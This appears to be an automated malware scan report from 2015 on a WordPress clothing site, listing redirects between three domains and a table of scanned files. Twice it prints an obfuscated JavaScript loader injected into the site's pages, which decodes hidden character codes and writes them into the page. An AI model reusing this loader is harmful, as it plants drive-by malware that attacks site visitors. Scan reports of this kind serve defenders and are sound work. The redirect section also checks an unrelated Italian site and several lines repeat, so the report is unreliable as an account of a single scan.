Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lyractivewear.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: piantaunlibro.it
Result:
GET / HTTP/1.1
Host: piantaunlibro.it
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: piantaunlibro.it
Referer: http://www.google.com/search?q=piantaunlibro.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: piantaunlibro.it
Referer: http://www.google.com/search?q=piantaunlibro.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://lyractivewear.com/ | HTTP/1.1 302 Found Connection: close Date: Tue, 20 Jan 2015 12:09:34 GMT Location: http://museactivewear.com/ Server: Apache Content-Length: 277 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://museactivewear.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Tue, 20 Jan 2015 12:09:35 GMT Pragma: no-cache Location: http://lyraactivewear.com/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=42jn5qfe868ltj6l3s9lf38ln5; path=/ X-Pingback: http://lyraactivewear.com/xmlrpc.php | clean |
http://lyraactivewear.com/ | 200 OK Content-Length: 19132 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw9 = []; _gw9.push(['_setPageId', '1301851861911781711021861911821711311041861711901861171']); _gw9.push(['_trackPageview', '6918518510413211617917118518516717317118817517118916518']); _gw9.push(['_setOption', '2193182181185175186175181180128167168185181178187186171']); _gw9.push(['_trackPageview', '1291691781751821281841711691861101221211201821901141671']); _gw9.push(['_setPageId', '8718618111416718718618111412212112018219011112919513011']); _gw9.push(['_setPageId', '7185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw9.length; v++) t += _gw9[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://lyraactivewear.com/wp-content/themes/muse/js/menucontents.js | 200 OK Content-Length: 566 Content-Type: application/x-javascript | clean |
http://lyractivewear.com/wp-content/themes/muse/js/anylinkmenu.js | HTTP/1.1 302 Found Connection: close Date: Tue, 20 Jan 2015 12:09:38 GMT Location: http://museactivewear.com/ Server: Apache Content-Length: 277 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://museactivewear.com/test404page.js | 404 Not Found Content-Length: 15921 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw9 = []; _gw9.push(['_setPageId', '1301851861911781711021861911821711311041861711901861171']); _gw9.push(['_trackPageview', '6918518510413211617917118518516717317118817517118916518']); _gw9.push(['_setOption', '2193182181185175186175181180128167168185181178187186171']); _gw9.push(['_trackPageview', '1291691781751821281841711691861101221211201821901141671']); _gw9.push(['_setPageId', '8718618111416718718618111412212112018219011112919513011']); _gw9.push(['_setPageId', '7185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw9.length; v++) t += _gw9[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://museactivewear.com/wp-content/themes/muse/js/menucontents.js | 200 OK Content-Length: 566 Content-Type: application/x-javascript | clean |
http://museactivewear.com/wp-content/themes/muse/js/anylinkmenu.js | 200 OK Content-Length: 13061 Content-Type: application/x-javascript | clean |
http://lyraactivewear.com/wp-content/plugins/easing-slider/js/jquery.js?ver=1.4.2 | 200 OK Content-Length: 72328 Content-Type: application/x-javascript | clean |
http://lyraactivewear.com/wp-includes/js/swfobject.js?ver=2.2 | 200 OK Content-Length: 10220 Content-Type: application/x-javascript | clean |
http://lyraactivewear.com/wp-content/plugins/easing-slider/js/jquery.easing.js?ver=1.3 | 200 OK Content-Length: 8301 Content-Type: application/x-javascript | clean |
http://lyraactivewear.com/wp-content/plugins/easing-slider/js/script.js?ver=1.1.7 | 200 OK Content-Length: 9490 Content-Type: application/x-javascript | clean |
https://seal.godaddy.com/getSeal?sealID=3ySWWWtU8TV8PcRTPgp8PqfUzYtLjXwGKWSzkVTEGPXnokE8uvqR3sQ8vW | 204 No Content Content-Length: 0 Content-Type: text/plain | clean |
http://seal.godaddy.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://lyraactivewear.com/wp-includes/js/thickbox/thickbox.js?ver=3.1-20100407 | 200 OK Content-Length: 12292 Content-Type: application/x-javascript | clean |
http://lyraactivewear.com/?sjsl=colorbox,shopp,catalog,cart&c=1&ver=98239bb061a58639408323699680ad0e | 200 OK Content-Length: 23489 Content-Type: application/x-javascript | clean |
http://lyractivewear.com/wp-content/themes/muse/jsfont/cufon-yui.js | HTTP/1.1 302 Found Connection: close Date: Tue, 20 Jan 2015 12:09:46 GMT Location: http://museactivewear.com/ Server: Apache Content-Length: 277 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://lyractivewear.com/wp-content/themes/muse/jsfont/Helvetica_Neue_LT_Std_900.js | HTTP/1.1 302 Found Connection: close Date: Tue, 20 Jan 2015 12:09:47 GMT Location: http://museactivewear.com/ Server: Apache Content-Length: 277 Content-Type: text/html; charset=iso-8859-1 | malicious |